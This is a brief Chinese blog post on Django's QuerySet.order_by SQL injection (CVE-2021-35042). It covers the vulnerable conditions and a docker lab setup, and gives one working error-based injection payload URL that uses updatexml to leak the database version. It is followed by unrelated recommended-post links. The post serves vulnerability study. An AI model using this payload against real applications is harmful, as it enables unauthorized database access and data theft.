漏洞描述
Django 于 2021年7月1日发布了一个安全更新,修复了函数QuerySet.order_by中的 SQL 注入漏洞。
参考链接:
该漏洞需要开发人员使用order_by功能。此外,还可以控制查询集的输入。
漏洞环境及利用
搭建docker环境
payload
/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20@@version)),1)%23
Django QuerySet.order_by SQL注入漏洞(CVE-2021-35042)
blackK_YC2023-11-26 19:09
相关推荐
阿里云大数据AI技术11 小时前
用 SQL 调大模型?Hologres + 百炼,让数据开发直接“对话”AImarkfeng85 天前
Python+Django+H5+MySQL项目搭建QQ4022054965 天前
Python+django+vue3预制菜半成品配菜平台百锦再5 天前
Django实现接口token检测的实现方案starlaky5 天前
Django入门笔记QQ5110082855 天前
python+springboot+django/flask的校园资料分享系统WeiXin_DZbishe5 天前
基于django在线音乐数据采集的设计与实现-计算机毕设 附源码 22647B站计算机毕业设计超人5 天前
计算机毕业设计Django+Vue.js高考推荐系统 高考可视化 大数据毕业设计(源码+LW文档+PPT+详细讲解)计算机程序猿学长5 天前
大数据毕业设计-基于django的音乐网站数据分析管理系统的设计与实现(源码+LW+部署文档+全bao+远程调试+代码讲解等)B站计算机毕业设计超人5 天前
计算机毕业设计Django+Vue.js音乐推荐系统 音乐可视化 大数据毕业设计 (源码+文档+PPT+讲解)